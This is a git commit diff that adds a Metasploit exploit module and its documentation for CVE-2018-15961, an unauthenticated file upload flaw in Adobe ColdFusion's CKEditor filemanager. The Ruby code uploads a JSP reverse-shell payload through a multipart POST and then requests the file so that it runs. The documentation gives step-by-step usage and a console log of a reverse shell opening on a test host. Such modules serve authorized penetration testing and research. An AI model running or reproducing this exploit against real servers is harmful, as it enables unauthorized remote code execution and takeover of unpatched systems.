Land #11206, add coldfusion ckeditor file upload

2019-01-10 07:27:38 -06:00 · 2019-01-10 07:27:38 -06:00 · 2f939481e7
parent de65d98f2c 8ebbd9eeea
commit 2f939481e7
2 changed files with 141 additions and 0 deletions
--- a/documentation/modules/exploit/multi/http/coldfusion_ckeditor_file_upload.md
+++ b/documentation/modules/exploit/multi/http/coldfusion_ckeditor_file_upload.md
@ -0,0 +1,48 @@
+## Description
+
+A file upload vulnerability in the CKEditor of Adobe ColdFusion 11 
+(Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and 
+ColdFusion 2018 (July 12 release) allows unauthenticated remote 
+attackers to upload and execute JSP files through the filemanager 
+plugin. Tested on Adobe ColdFusion 2018 v2018.0.0.310739.
+
+## Vulnerable Application
+
+ColdFusion 11 (Update 14 and earlier),
+ColdFusion 2016 (Update 6 and earlier), and 
+[ColdFusion 2018 (July 12 release)](https://bintray.com/eaps/coldfusion/cf%3Acoldfusion/2018.0.0)
+
+## Verification Steps
+
+1. `./msfconsole -q`
+2. `use exploit/multi/http/coldfusion_ckeditor_file_upload`
+3. `set rhosts <rhost>`
+4. `set lhost <lhost>`
+5. `exploit`
+6. Get a shell
+
+## Scenarios
+
+### Tested on Coldfusion 2018 v2018.0.0.310739
+
+```
+msf5 > use exploit/multi/http/coldfusion_ckeditor_file_upload
+msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > set rhosts 172.22.222.142
+rhosts => 172.22.222.142
+msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > set lhost 172.22.222.136 
+lhost => 172.22.222.136
+msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > exploit
+
+[*] Started reverse TCP handler on 172.22.222.136:4444 
+[*] Uploading the JSP payload at /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/ASMK.jsp...
+[+] Upload succeeded! Executing payload...
+[*] Command shell session 1 opened (172.22.222.136:4444 -> 172.22.222.142:43262) at 2019-01-10 06:30:52 -0600
+
+whoami
+cfuser
+uname -a
+Linux 6bd4238e7ffb 4.15.0-38-generic #41-Ubuntu SMP Wed Oct 10 10:59:38 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+exit
+[*] 172.22.222.142 - Command shell session 1 closed.
+msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) >
+```
--- a/modules/exploits/multi/http/coldfusion_ckeditor_file_upload.rb
+++ b/modules/exploits/multi/http/coldfusion_ckeditor_file_upload.rb
@ -0,0 +1,93 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  include Msf::Exploit::Remote::HttpClient
+
+  Rank = ExcellentRanking
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Adobe ColdFusion CKEditor unrestricted file upload',
+      'Description'     => %q{
+        A file upload vulnerability in the CKEditor of Adobe ColdFusion 11
+        (Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and
+        ColdFusion 2018 (July 12 release) allows unauthenticated remote
+        attackers to upload and execute JSP files through the filemanager
+        plugin.
+        Tested on Adobe ColdFusion 2018.0.0.310739.
+      },
+      'Author'          =>
+        [
+          'Pete Freitag de Foundeo',  # Vulnerability discovery
+          'Vahagn vah_13 Vardanian',  # First public PoC
+          'Qazeer'                    # Metasploit module
+        ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          [ 'CVE', '2018-15961' ],
+          [ 'BID', '105314' ],
+          [ 'URL', 'https://helpx.adobe.com/fr/security/products/coldfusion/apsb18-33.html' ]
+        ],
+      'Privileged'      => false,
+      'Platform'        => %w{ linux win },
+      'Arch'            => ARCH_JAVA,
+      'Targets'         =>
+        [
+          [ 'Java Universal',
+            {
+              'Arch'     => ARCH_JAVA,
+              'Platform' => %w{ linux win },
+              'Payload'  => { 'DisableNops' => true },
+              'DefaultOptions' => {'PAYLOAD' => 'java/jsp_shell_reverse_tcp'}
+            }
+          ]
+        ],
+      'DefaultTarget'   => 0,
+      'DefaultOptions'  => { 'RPORT' => 8500 },
+      'DisclosureDate'  => 'Sep 11 2018'
+    ))
+
+    register_options [
+      OptString.new('TARGETURI', [ false, 'Base application path', '/' ]),
+    ]
+  end
+
+  def exploit
+    filename = rand_text_alpha_upper(1..10) + '.jsp'
+
+    print_status("Uploading the JSP payload at #{target_uri}cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/#{filename}...")
+
+    mime = Rex::MIME::Message.new
+    mime.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
+    mime.add_part('path', 'text/plain', nil, 'form-data; name="path"')
+
+    post_str = mime.to_s
+    post_str.strip!
+
+    res = send_request_cgi({
+      'uri'     => normalize_uri(target_uri, 'cf_scripts','scripts','ajax','ckeditor','plugins','filemanager','upload.cfm'),
+      'version' => '1.1',
+      'method'  => 'POST',
+      'ctype'   => 'multipart/form-data; boundary=' + mime.bound,
+      'data'    => post_str,
+    })
+
+    unless res && res.code == 200
+      fail_with Failure::Unknown, 'Upload Failed...'
+    end
+
+    print_good('Upload succeeded! Executing payload...')
+
+    send_request_cgi({
+      'uri'     => normalize_uri(target_uri, 'cf_scripts', 'scripts', 'ajax',
+                    'ckeditor', 'plugins', 'filemanager', 'uploadedFiles', filename),
+      'method' => 'GET'
+    }, 5)
+
+  end
+end